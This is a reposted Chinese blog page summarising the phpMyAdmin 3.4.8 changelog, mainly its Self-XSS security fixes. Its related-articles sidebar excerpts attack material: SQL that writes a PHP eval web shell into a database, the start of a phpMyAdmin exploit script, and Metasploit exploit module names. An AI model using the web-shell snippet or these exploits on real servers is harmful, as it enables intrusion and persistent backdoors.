phpMyAdmin 3.4.8 新版中修复的BUG

最新推荐文章于 2024-07-17 12:52:39 发布
最新推荐文章于 2024-07-17 12:52:39 发布
阅读量78 收藏
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/mwinds/archive/2011/12/02/2272257.html
版权
phpMyAdmin是PHP编写的WEB版本的MYSQL管理工具
优点:Web 的 phpMyAdmin 工具。这是一种 MySQL 数据库前台的基于PHP的工具。   
缺点:必须安装在 Web 服务器中,所以如果没有合适的访问权限,其它用户有可能损害到 SQL 数据。但这已不是什么问题了,现在众多的IDC公司都采用PHPmyadmin来作为客户的自助管理工具,并且多数都禁用GUI 的程序的访问,可以说是解决MYSQL使用的一大难题。类似的MSSQL的WEB版本笔者也用过几个,但明显没有MYSQL这么方便。这当然也跟MSYQL的开源性质有着直接的关系。


phpMyAdmin 3.4.8主要修复了一些XSS安全漏洞,其中包括:


数据库名称同步、重命名导致的Self-XSS安全问题
列类型(创建索引、表搜索)导致的Self-XSS安全问题
无效查询导致的Self-XSS安全问题
该版本添加了几个补丁,主要针对:

使php-gettext的location可配置
在open_basedir状态下的冲突处理
多服务器配置中的内联编辑
PHP 5.4中的数组/字符串转换


3.4.8.0 BUG修复列表
- bug #3425230 [interface] enum data split at space char (more space to edit)
- bug #3426840 [interface] ENUM/SET editor can't handle commas in values
- bug #3427256 [interface] no links to browse/empty views and tables
- bug #3430377 [interface] Deleted search results remain visible
- bug #3428627 [import] ODS import ignores memory limits
- bug #3426836 [interface] Visual column separation
- bug #3428065 [parser] TRUE not recognized by parser
+ patch #3433770 [config] Make location of php-gettext configurable
- patch #3430291 [import] Handle conflicts in some open_basedir situations
- bug #3431427 [display] Dropdown results - setting NULL does not work
- patch #3428764 [edit] Inline edit on multi-server configuration
- patch #3437354 [core] Notice: Array to string conversion in PHP 5.4
- [interface] When ShowTooltipAliasTB is true, VIEW is wrongly shown as the
  view name in main panel db Structure page
- bug #3439292 [core] Fail to synchronize column with name of keyword
- bug #3425156 [interface] Add column after drop
- [interface] Avoid showing the password in phpinfo()'s output
- bug #3441572 [GUI] 'newer version of phpMyAdmin' message not shown in IE8
- bug #3407235 [interface] Entering the key through a lookup window does not res
et NULL
- [security] Self-XSS on database names (Synchronize), see PMASA-2011-18
- [security] Self-XSS on database names (Operations/rename), see PMASA-2011-18
- [security] Self-XSS on column type (Create index), see PMASA-2011-18
- [security] Self-XSS on column type (table Search), see PMASA-2011-18
- [security] Self-XSS on invalid query (table overview), see PMASA-2011-18


下载地址:http://www.phpmyadmin.net/home_page/downloads.php

本文转载自:http://www.mwinds.net/read.php?lmid=30&id=680

 

 

转载于:https://www.cnblogs.com/mwinds/archive/2011/12/02/2272257.html

weixin_30793643
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9508
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
PhpMyadmin各版本漏洞合集
09-13 6028
1.PhpMyAdmin存在PREGREPLACEEVAL漏洞 影响版本: 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 利用模块: exploit/multi/http/phpmyadminpregreplace CVE: CVE-2013-3238 2.PhpMyAdmin存在serversync.php 后门漏洞 影响版...
phpmyadmin 0day exp
weixin_34014277的博客
07-13 245
虽然还是很鸡肋(要求根目录下存在config文件夹且可写),不过好很多了。可以无视session.auto_start配置了。 #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ pma...
PhpMyadmin任意文件读取漏洞
cnbird's blog
11-07 5719
libraries/import/xml.php unset($data); /** * Load the XML string * * The option LIBXML_COMPACT is specified because it can * result in increased performance without the need
phpMyAdmin-3.4.8-all-languages.tar
03-11
在“phpMyAdmin-3.4.8-all-languages.tar”这个压缩包,包含了所有这些功能的源代码和语言文件。解压后,你可以根据自己的服务器环境进行配置和安装。安装过程,需要注意的是,phpMyAdmin依赖于PHP和MySQL环境,...
phpMyAdmin-3.4.8-all-languages.zip
12-09
标题的"phpMyAdmin-3.4.8-all-languages.zip"指的是phpMyAdmin的3.4.8版本,它包含了所有语言的支持,这使得全球用户都能方便地使用。 phpMyAdmin是一款基于Web的开源应用程序,主要由PHP语言编写,用于在线管理...
使用PHPMyAdmin修复论坛数据库的图文方法
10-28
服务器意外重启或者断电、MySQL 不稳定等,都有可能引起数据表损坏。本教程简单讲述如何使用 phpMyAdmin 修复数据表
解决phpmyadmin文乱码问题。。。
10-31
解决phpMyAdmin文乱码问题 PHPMyAdmin是最流行的MySQL数据库管理工具,但是许多用户在使用时遇到文乱码问题,这个问题让用户感到非常头疼。今天我们将讨论解决phpMyAdmin文乱码问题的方法。 问题分析 ...
实战mysql导出文乱码及phpmyadmin导入文乱码的解决方法
10-29
因为要把本机的gbk编码的mysql数据库导入到虚拟主机去,服务商只提供了phpmyadmin供你导入导出。
phpMyAdmin phpmyadmin.css.php完全路径泄露漏洞
收集盒 Book box
12-13 1170
发布日期:2011-10-17 更新日期:2011-10-18 受影响系统: phpMyAdmin phpMyAdmin 3.4.5 描述: -------------------------------------------------------------------------------- phpMyAdmin是一个用PHP编写的,可以通过 web 方式控制和操作 My
phpmyadmin后台4种拿shell方法及php爆路径收集
weixin_30367873的博客
08-31 1207
php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SE...
phpmyadmin后台文件包含漏洞分析
nareku的博客
04-10 5913
前言 在墨者学院看到这道题给的标签是文件包含,就想着拿来练练手,果然不练不知道一练吓一跳,里面还是有很多我没学到和不懂的知识,所以就打算单独拿出来写一篇博客来记录一下。
全新UI自助图文打印系统小程序源码/自助云打印机前后端源码
最新发布
12年全栈程序开发
07-17 214
这些服务覆盖了多种文件格式,包括文档、图片、表格等。除此之外,系统还集成了额外的特色功能,如美颜、换装以及文档打印等,以满足用户的不同需求。管理员可进管理后台对打印机进行管理。最新的自助图文打印系统和证件照云打印小程序源码采用了PHP作为后端开发语言,旨在为用户提供全面的自助打印服务。
小欧吃苹果-OPPO 2024届校招正式批笔试题-数据开发(C卷)
sigd的博客
07-16 498
小欧吃苹果,拓扑排序处理贪心问题。
释放Laravel Blade的威力:掌握Laravel的模板引擎
2401_85812026的博客
07-16 1288
Blade是Laravel的内置模板引擎,它让你的前端代码更加简洁、易读。Blade视图文件通常以.blade.php为扩展名,支持直接在视图文件使用PHP代码。
PHP基础语法
红客网络编程与渗透技术
07-15 257
下面,我们提供了一个简单的 PHP 文件实例,它可以向浏览器输出文本 "Hello World!PHP 的每个代码行都必须以分号结束。分号是一种分隔符,用于把指令集区分开来。通过 PHP,有两种在浏览器输出文本的基础指令:echo 和 print。PHP 脚本在服务器上执行,然后将纯 HTML 结果发送回浏览器。PHP 文件通常包含 HTML 标签和一些 PHP 脚本代码。PHP 脚本以
php 实现栈
huanghm88的专栏
07-16 342
可以根据需要使用这些方法来操作栈。类,其包含了入栈()和判断栈是否为空(
phpmyadmin輸入
04-24
phpMyAdmin是一个用于管理MySQL数据库的免费开源工具。它提供了一个基于Web的界面,使用户...在phpMyAdmin输入文时,您可以直接在相应的输入框输入文字符。确保您的操作系统和浏览器已正确设置为支持文输入。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值